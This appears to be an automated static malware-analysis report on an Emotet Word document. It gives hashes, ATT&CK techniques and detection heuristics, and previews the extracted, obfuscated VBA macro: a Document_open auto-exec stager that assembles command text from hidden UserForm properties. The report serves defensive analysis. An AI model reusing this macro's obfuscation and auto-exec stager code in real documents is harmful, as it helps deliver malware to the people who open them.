Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d3a971e91f47c541…

MALICIOUS

Office (OLE)

196.5 KB Created: 2019-12-16 11:52:00 Authoring application: Microsoft Office Word First seen: 2020-09-24
MD5: 3e41a800ec6a0fc6cebdab5f3db9ee12 SHA-1: 89859ef8b0cd9bac82dde95e1cc89076b9a8bf25 SHA-256: d3a971e91f47c541df76801e52a72840032f85e684147587c26417c906644908
302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains a VBA macro that is automatically executed upon opening the document, as indicated by the Document_Open macro and the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic. Critical heuristics identify this as a hidden command stager designed to execute code via UserForm properties and CreateObject/GetObject calls. ClamAV detection confirms this is a known Emotet downloader variant.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7458561-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7458561-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8121 bytes
SHA-256: 0cd7ccc0fc161a39607d71ebbceefad3644e60dbcd6be62f45af1aeac86c6fd5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Bitxhrjgp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Nvfplifobfo, 0, 0, MSForms, TextBox"
Private Sub Document_open()
      Dim Ggvyuqilog
      Dim Rjzpngdwx
      For Adoevnutxqrg = Wsdafmwkc To 0
         Keaoexfvf = xPI
         Ywmnbtnrn = CDbl(3)
         Gmmxunopzdbg = Tan(MyeW5A)
         Dissmfxs = 4 - Rifvxdpjnqynb
         Sgqvcwpj = (3 - Luzbqxnopfmht)
         Ostmdpglpuygx = Cytwmiqi
         Lzlbplnyznev = CDbl(6)
         Jejjgrqpso = Tan(Nwfnyjwtspv)
      Next
      Dim Lllknmteqqpn
      Dim Xmuesxtmslj
      For Spwoynaiop = Wsdafmwkc To 0
         Layfolbpsyk = xPI
         Qnaysabzbb = CDbl(3)
         Braghjxhngxu = Tan(MyeW5A)
         Ahystftg = 4 - Ajvplrkyjlnta
         Pnvvkqgrnz = (3 - Iijbvkag)
         Hvwvzkvrhgq = Rxkwjtrh
         Qbpzjsizbmbf = CDbl(6)
         Oqvvwsmjaesdk = Tan(Mgfsdfujkmyy)
      Next
      Dim Grgtpuhf
      Dim Obyhsxlwobgh
      For Atfgcxmbgig = Wsdafmwkc To 0
         Tgpuueyuywta = xPI
         Evgxzdrswo = CDbl(3)
         Hemuqbge = Tan(MyeW5A)
         Ygmdpubxmfa = 4 - Gzkhicaka
         Wtidfstwrnw = (3 - Vnwrzcuctw)
         Guxbsgxmvgwm = Umdwukazlvg
         Yzodwcizxw = CDbl(6)
         Hymqpqjthhiyw = Tan(Uhjcvivyngdzk)
      Next
Wnzvxsqak
End Sub

Attribute VB_Name = "Noxbrghspp"
Attribute VB_Base = "0{8D8AB0EE-BCBE-4569-9D91-ACBA2ABA6288}{11439809-AED8-417B-8B3C-336D335BD734}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Iyejcapn"
Function Ialmizozauxqh()
      Dim Somucqcw
      Dim Mzszclbggbzr
      For Jufgbijjtmhva = Wsdafmwkc To 0
         Vdatotvnuz = xPI
         Rmrbaynkhkwuy = CDbl(3)
         Ggsgkxwk = Tan(MyeW5A)
         Ybfnglhsiswck = 4 - Nsbkgfugpphcs
         Ubtccwhx = (3 - Pcpqgevljxevz)
         Dvpxziougxvi = Afvalrdf
         Llqjaxzccj = CDbl(6)
         Rzbqaiis = Tan(Oiiriuozpyfg)
      Next
Fwewzziysa = Bitxhrjgp.Nvfplifobfo
      Dim Jttzzpbr
      Dim Qffanlmbhzd
      For Mofdeuigncrkm = Wsdafmwkc To 0
         Dmbrnhfaq = xPI
         Qvcjgzyuhkul = CDbl(3)
         Ohccopabhxuxl = Tan(MyeW5A)
         Goozmeneevr = 4 - Cujbftyzdxc
         Onepjnadavf = (3 - Tbdygwejzm)
         Sszrdrmmvpzz = Eknczepvax
         Qfjhpbrvq = CDbl(6)
         Mwetzodb = Tan(Tstvwmjdxs)
      Next
Xuozuvkm = Fwewzziysa + Noxbrghspp.Jxzubcxrxu + Noxbrghspp.Gsyrwbuclsok + Noxbrghspp.Ydntosjwwp
      Dim Qcwifcgsn
      Dim Ulwwtvpu
      For Jiabtjdnhweof = Wsdafmwkc To 0
         Mrvazsxlq = xPI
         Kvzzqebgh = CDbl(3)
         Glscefzvffkrg = Tan(MyeW5A)
         Tdhlxkylzhoi = 4 - Nzekqlji
         Sluxcaetvwk = (3 - Vwlhatupxuvrg)
         Psklgtsmp = Zdvmjppaio
         Jpcyvryf = CDbl(6)
         Xeclzsfcjwgr = Tan(Ukkgcfwskpb)
      Next
Zwkyadvwkg = Xuozuvkm + Noxbrghspp.Txzwzvgnylw + Noxbrghspp.Ygdcwgum
      Dim Ajtbzfgrttacu
      Dim Agtiijgeyeub
      For Xhvvtrduxsraj = Wsdafmwkc To 0
         Njoqhqxs = xPI
         Qteuwedpvvmeh = CDbl(3)
         Pfiariac = Tan(MyeW5A)
         Vgkjgzoqxd = 4 - Zbnnkoiqibnpr
         Ropprcjbytf = (3 - Xojxerfhmdxmu)
         Tsvrvlxb = Gvqzptezmst
         Lafgfkrdwrg = CDbl(6)
         Yoskambkx = Tan(Hxjsmisjbck)
      Next
Ialmizozauxqh = Gnnsnrmty + Zwkyadvwkg + Gnnsnrmty
      Dim Iunyjhyvwf
      Dim Bbygtfrmsf
      For Hcmpqervb = Wsdafmwkc To 0
         Qcskogroaplcs = xPI
         Mzizrdmgq = CDbl(3)
         Ifsovhkfidav = Tan(MyeW5A)
         Bqgqvatel = 4 - Nczsdvbdtxmw
         Drndbmefspnf = (3 - Haetbwiflnfi)
         Jjpuuxsigake = Jjfxfgvss
         Pkxfzysnlvjz = CDbl(6)
         Tcyuejwiaw = Tan(Hdrwrqxze)
      Next
End Func
... (truncated)